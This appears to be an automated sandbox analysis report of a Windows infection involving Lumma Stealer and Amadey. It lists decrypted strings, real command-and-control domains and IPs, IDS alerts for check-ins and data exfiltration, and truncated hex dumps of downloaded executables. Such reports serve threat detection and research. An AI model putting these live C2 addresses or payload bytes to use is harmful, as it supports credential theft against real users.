                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exeJoe Sandbox ML: detected
                              Source: file.exeJoe Sandbox ML: detected
                              Source: 0000001B.00000002.2969358846.00000000000E1000.00000040.00000001.01000000.00000017.sdmpString decryptor: rapeflowwj.lat
                              Source: 0000001B.00000002.2969358846.00000000000E1000.00000040.00000001.01000000.00000017.sdmpString decryptor: crosshuaht.lat
                              Source: 0000001B.00000002.2969358846.00000000000E1000.00000040.00000001.01000000.00000017.sdmpString decryptor: sustainskelet.lat
                              Source: 0000001B.00000002.2969358846.00000000000E1000.00000040.00000001.01000000.00000017.sdmpString decryptor: aspecteirs.lat
                              Source: 0000001B.00000002.2969358846.00000000000E1000.00000040.00000001.01000000.00000017.sdmpString decryptor: energyaffai.lat
                              Source: 0000001B.00000002.2969358846.00000000000E1000.00000040.00000001.01000000.00000017.sdmpString decryptor: necklacebudi.lat
                              Source: 0000001B.00000002.2969358846.00000000000E1000.00000040.00000001.01000000.00000017.sdmpString decryptor: discokeyus.lat
                              Source: 0000001B.00000002.2969358846.00000000000E1000.00000040.00000001.01000000.00000017.sdmpString decryptor: grannyejh.lat
                              Source: 0000001B.00000002.2969358846.00000000000E1000.00000040.00000001.01000000.00000017.sdmpString decryptor: aspecteirs.lat
                              Source: 0000001B.00000002.2969358846.00000000000E1000.00000040.00000001.01000000.00000017.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                              Source: 0000001B.00000002.2969358846.00000000000E1000.00000040.00000001.01000000.00000017.sdmpString decryptor: TeslaBrowser/5.5
                              Source: 0000001B.00000002.2969358846.00000000000E1000.00000040.00000001.01000000.00000017.sdmpString decryptor: - Screen Resoluton:
                              Source: 0000001B.00000002.2969358846.00000000000E1000.00000040.00000001.01000000.00000017.sdmpString decryptor: - Physical Installed Memory:
                              Source: 0000001B.00000002.2969358846.00000000000E1000.00000040.00000001.01000000.00000017.sdmpString decryptor: Workgroup: -
                              Source: 0000001B.00000002.2969358846.00000000000E1000.00000040.00000001.01000000.00000017.sdmpString decryptor: CVmr0t--installs
                              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                              Source: unknownHTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.4:49867 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.4:49875 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.66.85:443 -> 192.168.2.4:49889 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.66.85:443 -> 192.168.2.4:49896 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.66.85:443 -> 192.168.2.4:49904 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.66.85:443 -> 192.168.2.4:49915 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.64.80:443 -> 192.168.2.4:49918 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.66.85:443 -> 192.168.2.4:49922 version: TLS 1.2
                              Source: Binary string: wkernel32.pdb source: ac68c6b737.exe, 00000015.00000003.2740135407.00000000050E0000.00000004.00000001.00020000.00000000.sdmp, ac68c6b737.exe, 00000015.00000003.2740038871.0000000004FC0000.00000004.00000001.00020000.00000000.sdmp
                              Source: Binary string: wkernelbase.pdb source: ac68c6b737.exe, 00000015.00000003.2740383178.0000000004FC0000.00000004.00000001.00020000.00000000.sdmp, ac68c6b737.exe, 00000015.00000003.2740579331.00000000051E0000.00000004.00000001.00020000.00000000.sdmp
                              Source: Binary string: ntdll.pdb source: ac68c6b737.exe, 00000015.00000003.2739303628.00000000051B0000.00000004.00000001.00020000.00000000.sdmp, ac68c6b737.exe, 00000015.00000003.2739087484.0000000004FC0000.00000004.00000001.00020000.00000000.sdmp
                              Source: Binary string: wntdll.pdbUGP source: ac68c6b737.exe, 00000015.00000003.2739796266.0000000005160000.00000004.00000001.00020000.00000000.sdmp, ac68c6b737.exe, 00000015.00000003.2739612321.0000000004FC0000.00000004.00000001.00020000.00000000.sdmp
                              Source: Binary string: ntdll.pdbUGP source: ac68c6b737.exe, 00000015.00000003.2739303628.00000000051B0000.00000004.00000001.00020000.00000000.sdmp, ac68c6b737.exe, 00000015.00000003.2739087484.0000000004FC0000.00000004.00000001.00020000.00000000.sdmp
                              Source: Binary string: wntdll.pdb source: ac68c6b737.exe, 00000015.00000003.2739796266.0000000005160000.00000004.00000001.00020000.00000000.sdmp, ac68c6b737.exe, 00000015.00000003.2739612321.0000000004FC0000.00000004.00000001.00020000.00000000.sdmp
                              Source: Binary string: protobuf-net.pdbSHA256}Lq source: zudFSfy.exe, 00000009.00000002.2499731159.0000000005AF0000.00000004.08000000.00040000.00000000.sdmp, zudFSfy.exe, 00000009.00000002.2486574208.0000000003321000.00000004.00000800.00020000.00000000.sdmp, zudFSfy.exe, 00000009.00000002.2494620815.0000000004321000.00000004.00000800.00020000.00000000.sdmp, zudFSfy.exe, 00000009.00000002.2494620815.00000000043ED000.00000004.00000800.00020000.00000000.sdmp, kz8ZdyP.exe, 0000000D.00000002.2573081196.0000000002ABA000.00000004.00000800.00020000.00000000.sdmp
                              Source: Binary string: protobuf-net.pdb source: zudFSfy.exe, 00000009.00000002.2499731159.0000000005AF0000.00000004.08000000.00040000.00000000.sdmp, zudFSfy.exe, 00000009.00000002.2486574208.0000000003321000.00000004.00000800.00020000.00000000.sdmp, zudFSfy.exe, 00000009.00000002.2494620815.0000000004321000.00000004.00000800.00020000.00000000.sdmp, zudFSfy.exe, 00000009.00000002.2494620815.00000000043ED000.00000004.00000800.00020000.00000000.sdmp, kz8ZdyP.exe, 0000000D.00000002.2573081196.0000000002ABA000.00000004.00000800.00020000.00000000.sdmp
                              Source: Binary string: wkernel32.pdbUGP source: ac68c6b737.exe, 00000015.00000003.2740135407.00000000050E0000.00000004.00000001.00020000.00000000.sdmp, ac68c6b737.exe, 00000015.00000003.2740038871.0000000004FC0000.00000004.00000001.00020000.00000000.sdmp
                              Source: Binary string: wkernelbase.pdbUGP source: ac68c6b737.exe, 00000015.00000003.2740383178.0000000004FC0000.00000004.00000001.00020000.00000000.sdmp, ac68c6b737.exe, 00000015.00000003.2740579331.00000000051E0000.00000004.00000001.00020000.00000000.sdmp
                              Source: Binary string: C:\Users\danie\source\repos\NewText\NewText\obj\Debug\NewText.pdb source: skotes.exe, 00000006.00000002.2970891358.000000000079A000.00000004.00000020.00020000.00000000.sdmp, e56fffc2ce.exe, 0000000E.00000000.2625265677.00000000008B2000.00000002.00000001.01000000.00000012.sdmp
                              Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\
                              Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\
                              Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\main\
                              Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\
                              Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\
                              Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\main\extracted
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeCode function: 4x nop then jmp 04D15B19h7_2_04D15193
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeCode function: 4x nop then jmp 04D15B19h7_2_04D1516B

                              Networking

                              barindex
                              Source: Network trafficSuricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.4:49748 -> 185.215.113.43:80
                              Source: Network trafficSuricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.4:49754
                              Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49777 -> 185.215.113.43:80
                              Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49802 -> 185.215.113.43:80
                              Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49832 -> 185.215.113.43:80
                              Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49854 -> 185.215.113.43:80
                              Source: Network trafficSuricata IDS: 2058354 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (aspecteirs .lat) : 192.168.2.4:54369 -> 1.1.1.1:53
                              Source: Network trafficSuricata IDS: 2058355 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (aspecteirs .lat in TLS SNI) : 192.168.2.4:49889 -> 104.21.66.85:443
                              Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49888 -> 185.215.113.43:80
                              Source: Network trafficSuricata IDS: 2058355 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (aspecteirs .lat in TLS SNI) : 192.168.2.4:49896 -> 104.21.66.85:443
                              Source: Network trafficSuricata IDS: 2058355 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (aspecteirs .lat in TLS SNI) : 192.168.2.4:49904 -> 104.21.66.85:443
                              Source: Network trafficSuricata IDS: 2058378 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat) : 192.168.2.4:53237 -> 1.1.1.1:53
                              Source: Network trafficSuricata IDS: 2058355 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (aspecteirs .lat in TLS SNI) : 192.168.2.4:49915 -> 104.21.66.85:443
                              Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49908 -> 185.215.113.43:80
                              Source: Network trafficSuricata IDS: 2058364 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat) : 192.168.2.4:58687 -> 1.1.1.1:53
                              Source: Network trafficSuricata IDS: 2058355 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (aspecteirs .lat in TLS SNI) : 192.168.2.4:49922 -> 104.21.66.85:443
                              Source: Network trafficSuricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.4:49918 -> 104.21.64.80:443
                              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49889 -> 104.21.66.85:443
                              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49889 -> 104.21.66.85:443
                              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49896 -> 104.21.66.85:443
                              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49896 -> 104.21.66.85:443
                              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49904 -> 104.21.66.85:443
                              Source: Malware configuration extractorURLs: grannyejh.lat
                              Source: Malware configuration extractorURLs: discokeyus.lat
                              Source: Malware configuration extractorURLs: aspecteirs.lat
                              Source: Malware configuration extractorURLs: crosshuaht.lat
                              Source: Malware configuration extractorURLs: necklacebudi.lat
                              Source: Malware configuration extractorURLs: sustainskelet.lat
                              Source: Malware configuration extractorURLs: rapeflowwj.lat
                              Source: Malware configuration extractorURLs: energyaffai.lat
                              Source: Malware configuration extractorURLs: sweepyribs.lat
                              Source: Malware configuration extractorURLs: https://198.251.84.107:9254/dc33e47f6acdb4eefe/ahbjmv76.0lxxe
                              Source: Malware configuration extractorIPs: 185.215.113.43
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.0.0.1
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 19 Dec 2024 05:09:11 GMTContent-Type: application/octet-streamContent-Length: 1114112Last-Modified: Thu, 19 Dec 2024 03:43:46 GMTConnection: keep-aliveETag: "67639672-110000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 24 95 63 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 cc 10 00 00 32 00 00 00 00 00 00 ee ea 10 00 00 20 00 00 00 00 11 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 11 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 94 ea 10 00 57 00 00 00 00 00 11 00 48 2f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 11 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 ca 10 00 00 20 00 00 00 cc 10 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 48 2f 00 00 00 00 11 00 00 30 00 00 00 ce 10 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 11 00 00 02 00 00 00 fe 10 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 ea 10 00 00 00 00 00 48 00 00 00 02 00 05 00 f0 3c 10 00 a4 ad 00 00 03 00 00 00 4b 00 00 06 90 cc 00 00 60 70 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fe 59 3f a8 46 36 30 84 8d 99 35 b2 d7 ba 38 1a 04 e1 c1 34 7a 63 cb 3a 03 56 92 13 f5 e3 07 ce b0 b7 af 4e 86 30 c8 a0 a9 18 31 bb 9b aa d3 d6 97 4f 2a 18 53 9a e6 7e 04 d9 f6 cb a2 c0 0c f1 49 85 ff a2 70 52 05 b8 69 49 c0 d2 09 93 f6 80 50 6e 7d 9b 0e d8 a3 69 4a 21 42 48 8d 2b 6f 2f 53 ce de 79 6a a1 0e 91 38 54 27 cb 7d fa c0 ca 0f 79 ae 49 a7 6b 44 18 0d cd ef cf 27 f4 88 c7 1c f4 24 c4 36 fa f9 8d ca 7d ad 9c 77 5b db 20 29 e0 89 13 6a 80 07 5b bd 2d 16 d1 30 b8 af 9b bc 7c 7f 95 97 70 cc 12 c3 e3 68 5c 1f ff 4c 8a be b5 18 52 d9 54 96 7e 14 b4 9a 8f 1a 04 62 14 4b 86 68 b2 f1 85 12 0a 22 07 38 c7 73 60 29 e1 f6 9a 31 dd bf b1 13 20 c5 cc aa 98 9e 5b 69 26 ce 39 95 e8 9a 8a 81 a4 61 3f 19 46 03 89 4e 1d d7 98 7e f5 ff cd 5f 12 5e 7f 1b 8e 51 88 1e b8 db bc e6 34 33 f7 4c 97 80 01 81 c2 40 76 b3 89 e6 78 c5 ae 07 49 42 ed 34 de da f1 ba c2 0c 8a b7 f3 9a f3 f4 ac 7c bc 00 05 b9 9e c6 28 8a f1 f1 82 ed c7 cc a1 03 ab 7e 18 59 f7
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 19 Dec 2024 05:09:20 GMTContent-Type: application/octet-streamContent-Length: 1102336Last-Modified: Thu, 19 Dec 2024 03:48:32 GMTConnection: keep-aliveETag: "67639790-10d200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 d0 96 63 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 9e 10 00 00 32 00 00 00 00 00 00 de bc 10 00 00 20 00 00 00 c0 10 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 11 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 8c bc 10 00 4f 00 00 00 00 c0 10 00 48 2f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 11 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e4 9c 10 00 00 20 00 00 00 9e 10 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 48 2f 00 00 00 c0 10 00 00 30 00 00 00 a0 10 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 11 00 00 02 00 00 00 d0 10 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 bc 10 00 00 00 00 00 48 00 00 00 02 00 05 00 e8 0e 10 00 a4 ad 00 00 03 00 00 00 4b 00 00 06 f8 ca 00 00 f0 43 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 57 02 2d 8e cd 0c 20 ba 00 42 26 9c 6e 80 29 54 ad 3a d4 2e 90 19 df c8 bb 0d 89 bb ee 35 db 47 93 2b ad 47 da 9c d7 83 e1 53 95 a2 b1 51 e7 c0 e4 30 78 9e db ef 4f f8 eb ee dd 28 70 97 ac 7a fa f4 4c 92 f0 53 00 3b e6 24 a9 58 6c a5 a2 88 69 25 c4 29 8b a5 5a e3 49 58 be 76 eb 53 5e 8f 69 37 e0 d7 8f 3a d3 2d 72 22 22 39 d6 1e 35 af 35 1c 86 3b 29 53 b2 91 61 1e de ec 05 00 50 5e 42 c4 4b 74 3f de 7f d1 21 27 de 20 c6 1a 2a bb 6b 8a 59 95 e1 94 db 13 94 c6 34 8d e7 af 76 24 e0 95 fb 24 51 2d 8c 08 83 30 9a 03 ee 21 ea 40 3f 8d 48 4d 83 2d 61 03 a2 e9 f5 c4 2c ea 3f af dd a6 58 92 30 16 72 85 de a7 a7 2c 61 15 fb aa f2 72 92 8f 93 67 15 4d fb 03 15 73 23 19 cc 03 71 2f 4a 4f 76 67 eb b4 37 68 21 78 06 a1 4f 63 3c 73 b3 1f b9 a6 a5 74 51 a6 07 9f 5d 0a 8a 69 09 e6 18 30 b2 67 f1 e0 0f 29 a6 64 a2 54 06 04 a7 51 22 01 72 32 68 37 85 c5 c4 e8 fa f0 9b cb f5 67 64 62 e2 ec 1e cf 83 40 2a 24 53 7d b0 23 74 95 f5 42 bf 7c 84 5c 84 40 fa 3f
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 19 Dec 2024 05:09:35 GMTContent-Type: application/octet-streamContent-Length: 21504Last-Modified: Wed, 18 Dec 2024 18:13:28 GMTConnection: keep-aliveETag: "676310c8-5400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 70 6d 3b c0 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 4a 00 00 00 08 00 00 00 00 00 00 3a 69 00 00 00 20 00 00 00 80 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 00 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e6 68 00 00 4f 00 00 00 00 80 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 00 00 0c 00 00 00 54 68 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 40 49 00 00 00 20 00 00 00 4a 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 9c 05 00 00 00 80 00 00 00 06 00 00 00 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 00 00 00 02 00 00 00 52 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 69 00 00 00 00 00 00 48 00 00 00 02 00 05 00 e4 36 00 00 70 31 00 00 03 00 02 00 1b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 02 00 38 00 00 00 01 00 00 11 73 32 00 00 06 0a 06 28 16 00 00 0a 7d 3c 00 00 04 06 02 7d 3d 00 00 04 06 15 7d 3b 00 00 04 06 7c 3c 00 00 04 12 00 28 01 00 00 2b 06 7c 3c 00 00 04 28 18 00 00 0a 2a 13 30 02 00 50 00 00 00 02 00 00 11 00 7e 02 00 00 04 16 fe 01 0a 06 2c 42 00 72 01 00 00 70 28 19 00 00 0a 00 72 63 00 00 70 28 19 00 00 0a 00 28 05 00 00 06 0b 72 a9 00 00 70 07 28 1a 00 00 0a 28 19 00 00 0a 00 07 28 04 00 00 06 6f 1b 00 00 0a 00 16 28 1c 00 00 0a 00 00 2a 13 30 02 00 38 00 00 00 03 00 00 11 73 2c 00 00 06 0a 06 28 16 00 00 0a 7d 15 00 00 04 06 02 7d 16 00 00 04 06 15 7d 14 00 00 04 06 7c 15 00 00 04 12 00 28 02 00 00 2b 06 7c 15 00 00 04 28 18 00 00 0a 2a 13 30 05 00 48 00 00 00 04 00 00 11 00 73 1d 00 00 0a 0a 1a 8d 2f 00 00 01 0b 16 0c 2b 1c 00 07 08 7e 03 00 00 04 06 7e 03 00 00 04 8e 69 6f 1e 00 00 0a 9a a2 00 08 17 58 0c 08 1a fe 04 0d 09 2d dc 72 cf 00 00 70 07 28 1f 00 00 0a 13 04 2b 00 11 04 2a 13 30 02 00 16
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 19 Dec 2024 05:09:40 GMTContent-Type: application/octet-streamContent-Length: 1978368Last-Modified: Thu, 19 Dec 2024 05:03:50 GMTConnection: keep-aliveETag: "6763a936-1e3000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cd d8 9a 7a 89 b9 f4 29 89 b9 f4 29 89 b9 f4 29 c2 c1 f7 28 82 b9 f4 29 c2 c1 f1 28 06 b9 f4 29 c2 c1 f0 28 9d b9 f4 29 9c c6 f1 28 af b9 f4 29 9c c6 f0 28 98 b9 f4 29 9c c6 f7 28 9d b9 f4 29 c2 c1 f5 28 8a b9 f4 29 89 b9 f5 29 da b9 f4 29 89 b9 f4 29 8b b9 f4 29 b3 39 f0 28 8a b9 f4 29 b3 39 0b 29 88 b9 f4 29 b3 39 f6 28 88 b9 f4 29 52 69 63 68 89 b9 f4 29 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 5f 7b 5f 64 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 25 00 7c 03 00 00 5e 03 00 00 00 01 00 00 70 4b 00 00 10 00 00 00 90 03 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 4b 00 00 04 00 00 7e 1d 1f 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 56 e0 07 00 6a 00 00 00 00 c0 07 00 6c 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 e1 07 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 b0 07 00 00 10 00 00 00 3c 04 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 6c 16 00 00 00 c0 07 00 00 08 00 00 00 4c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 e0 07 00 00 02 00 00 00 54 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 b0 29 00 00 f0 07 00 00 02 00 00 00 56 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 61 6c 63 76 68 64 61 7a 00 c0 19 00 00 a0 31 00 00 b2 19 00 00 58 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 76 6a 72 6b 64 62 77 7a 00 10 00 00 00 60 4b 00 00 04 00 00 00 0a 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 70 4b 00 00 22 00 00 00 0e 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
